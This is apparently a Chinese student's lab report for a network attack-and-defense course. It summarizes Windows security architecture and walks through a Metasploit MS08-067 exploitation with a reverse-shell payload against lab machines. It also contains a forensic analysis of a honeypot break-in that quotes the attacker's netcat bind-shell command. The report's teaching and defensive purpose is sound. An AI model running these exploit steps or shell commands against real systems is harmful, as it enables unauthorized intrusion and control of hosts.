20222820 2022-2023-3 《网络攻防实践》第6周作业

目录

1.实践内容

2.实践过程

3.学习中遇到的问题及解决

4.实践总结

---

1.实践内容

1. Windows操作系统基本框架概述

Windows操作系统内核的基本模块
Windows执行体： 即Windows内核核心文件ntoskrnl.exe的上层接口， 包含基本的操作系统内核服务
Windows内核体： 即Windows内核核心文件moskrnl.exe中酌数实现与硬件体系结构支持代码，实现底层的操作系统功能
设备驱动程序： 包括将用户I/O操作映射为特定硬件设备I/O请求的硬件设备驱动程序， 以及文件系统与网络设备驱动程序
硬件抽象层： 即hal.dll文件， 是用于屏蔽Windows 内核与平台硬件差异性的底层代码。
Windows窗口与图形界面接口内核实现代码： 即win32k.sys文件
** Windows操作系统在用户态的代码模块则包括如下：**
系统支持进程：Windows开机自动启动的系统内建服务进程，如用于登录认证的logon进程
环境子系统服务进程：为运行环境提供支持的服务进程
服务进程：通过Windows的服务管理机制所启动的一系列系统及网络服务
用户应用软件：在用户态执行的各类用户应用软件
核心子系统DLL：很多dll动态连接库文件，作为用户态服务进程与应用软件和操作系统内核的交互接口
Windows操作系统内核中实现了如下的核心机制：
windows进程和线程管理机制：进程可以看作是可执行程序运行的容器，Windows线程作为指令执行的具体载体
Windows内存管理机制：Windows的虚拟内存空间分为系统核心内存区间与用户内存区间两部分
Windows文件管理机制：NTFS文件系统从ACL访问控制列表来保证文件资源读／写的安全性，较FAT更加安全，此外具有更高的性能、可靠性和磁盘利用效率。Windows上的可执行文件采用PE(Portable Executable)格式
Windows注册表管理机制：注册表被称为Windows操作系统的核心，Windows系统注册表存放了关于计算机硬件的配置信息、系统和应用软件的初始化信息、应用软件和文档文件的关联关系、硬件设备的说明以及各种状态信息和数据，包括Windows操作时不断引用的信息。在 Windows系统配置和控制方面承担着关键角色。
Windows的网络机制：1.各种网卡硬件的设备驱动程序，一般由第三方硬件厂商开发并提供，处于OSl参考模型的物理层。2.NDIS (Network Driver Interface Specification)库及miniport驱动程序，位千OSI链路层，为各种不同的网卡适配器驱动程序和TDI传输层之间构建了一个封装接口3.TDI，传输层，将网络请求格式化成IRP，以及申请网络地址和数据通信4.网络API DLL及TDI客户端，会话层和表示层，独立于具体协议提供网络交互和实现方式5.网络应用程序与服务进程，对应OSI应用层，通常使用各类网络API DLL来实现网络交互与通信功能。

2. Windows操作系统的安全体系结构与机制

windows安全体系结构:
windows的安全体系结构基于引用监控器这一经典的安全模型。
其最核心的是位于内核的SRM安全引用监视器,以及位于用户态的LSASS安全服务，并与winlogin、eventlog等相关服务一起实现身份认证机制

windows身份认证机制与授权、访问控制机制
windows下的身份通过一个唯一的SID安全符进行标识
windows为每个用户和计算机设置账户进行管理，并引入用户组来简化用户管理
windows的用户账户的口令通过加密处理之后被保存于SAM或者活动目录AD中。
winlogon、GINA、LSASS服务通过协作来完成本地身份认证的过程。
在程序进程控制块中包含一个安全访问令牌，继承了启动进程的账户的所有访问令牌。
windows下所有需要保护的内容都被抽象成对象，每个对象会关联一个SD安全描述符。
windows安全审计机制和其他安全机制
LSAS服务将保存审计策略，在对象安全描述符中的SACL列表中进行保存
再次之外，安全中心还具有防火墙、补丁自动更新、病毒防护机制。
安全中心之外还有，IPSec加密与验证机制、EFS加密文件系统、windows文件保护机制等。

3.Windows远程安全攻防技术

windows远程安全攻防的分类
远程口令猜测与破解攻击
攻击windows网络服务
攻击windows客户端及用户
Metasploit基础教程

1. Metasploit的相关模块、介绍
Exploits 漏洞模块，使用“有效载荷（payloads）”的模块
Payloads 有效载荷，由远程运行的代码组成
Encoders 编码器，确保“有效载荷”到达目的地
Nops 空指令模块，保持“有效载荷”大小一致
2. Metasploit常用命令介绍
show exploit 列出metasploit框架中的所有渗透攻击模块。
show payloads 列出metasploit框架中的所有攻击载荷。
show auxiliary 列出metasploit框架中的所有辅助攻击模块。
search name 查找metasploit框架中的所有渗透攻击和其他模块。
info 展示出制定渗透攻击或模块的相关信息。
use name 装载一个渗透攻击或者模块。
LHOST 目标主机链接的IP地址。
RHOST 远程主机或者目标主机。
set function 设置特定的配置参数。
run scriptname 运行meterpreter脚本，在scripts/meterpreter目录下可查看到所有脚本名。
use priv 加载特权提升扩展模块，来扩展meterpreter库。
use incognito 加载inconito功能（用来盗取目标主机的令牌或是假冒用户）
getsystem 通过各种攻击向量来提升到系统用户权限。
shell 以所有可用令牌来运行一个交互的shell。
3. windows远程攻击方法的防御措施
口令猜测和破解：关闭不需要的端口、配置主机防火墙来限制上述端口、利用网络防火墙来限制这些服务的访问和禁用存在缺陷的NTLM
远程渗透攻击防范措施：从软件设计上尽量减少渗透攻击、尽可能快的更新安全补丁、为零日漏洞配置缓解攻击配置、利用安全清单插件来固化网络、通过漏洞扫描软件来标识存在的漏洞。

4。Windows本地安全攻防技术

windows本地特权提升
本地提权的常见三种手段：溢出提权、windows错误系统配置、计划任务提权。
防范措施：及时打补丁、及时跟进厂家的安全警告
windows敏感信息窃取
包括windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等手段
防范措施：使用安全度高、能抵挡破解的口令
windows消灭踪迹
主要手段包括、关闭审计功能、清理事件日志。
防范措施：实现配置好系统审计和网络服务审计功能，并将日志传输到安全服务器中。
远程控制与后门
主要手段包括向受控主机中植入第三方的远程控制与后门程序，主要包含命令行远程控制程序和图形化远程控制程序。
防范措施：采用一些后门检测软件来尝试发现攻击者隐藏的后门程序。

2.实践过程

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

在Kali中输入命令

 msfconsole

打开Metasploitable控制台

 输入命令 搜索ms08_067漏洞

search ms08_067

 

 输入命令 使用MS08-067漏洞作为我们攻击的目标

use windows/smb/ma08_067_natapi

 输入命令 show payloads，显示所有可攻击载荷

 

 

 输入命令 set LHOST 192.168.200.5，设置渗透攻击的主机为Kali；
输入命令 set RHOST 192.168.200.132，设置渗透攻击的主机为Win2k

set RHOST 192.168.200.132
set LHOST 192.168.200.5

但是此时没有攻击成功，因为没有把两个主机放进同一个网段里

 重新设置win2k的ip地址，192.168.200.6

 

使用命令exploit 进行攻击

 在Kali上使用命令ipconfig ，可以查询到靶机的IP，攻击成功

 

 

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

wireshark打开snort-0204@0117.log文件

输入过滤条件 ip.dst == 172.16.1.106 and http

 跟踪数据包的数据流，看到“%C0%AF”

 “%C0%AF”表示为Unicode编码，推测攻击者进行Unicode攻击，存在Unicode漏洞攻击。

分析包时看到多次的msadcs.dll

 

根据“ADM!ROX!YOUR!WORLD”特征字符串，以及查询语句中使用了“dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb”，可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的。

 

追踪数据流，可以看出攻击者通过建立ftpcom脚本

 攻击者执行命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe，表示攻击者来连接了6969端口，并获得了访问权限

 可以看到攻击者的操作

 姗迟了一些文件

 

追踪TCP流可以看到有rfp.txt 文件，可以得知攻击者已经知道这是台蜜罐主机

  

（3）团队对抗实践：windows系统远程渗透攻击和分析。

 攻击机IP地址：192.168.200.5（庞舒方kali）
被攻击机IP地址：192.168.200.9 (林怡平win2k)

使用攻击机ping靶机可以ping通

 攻击机输入命令"msfconsole"启动msfconsole。

 输入指令"use windows/smb/ms08_067_netapi"选择使用的漏洞

 使用命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接。

 设置攻击机IP地址和被攻击机IP地址，可以看到攻击成功，在对方靶机里新建一个文件夹

靶机可以在文件里找到这个文件夹

 

 

被攻击方使用wirshark截取数据包可以看到相关操作。

攻方使用metasploit选择漏洞进行攻击，获得控制权。

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息

3.学习中遇到的问题及解决

• 问题1：实验一中无法建立连接
• 问题1解决方案：把两个主机放到同一个网段。

4.实践总结

通过本次实验，进行了Windows操作系统安全攻防实践，动手实践Metasploit windows attacker，对解码一次成功的NT系统破解攻击进行了取证分析实践，最后进行了团队对抗实践，对windows系统远程渗透攻击和分析。通过进行实操，加深了自己对于windows系统安全的理解，提高了自己的动手能力。网络攻防使用一些工具也可以很快实现攻防，多百度多学习多实践。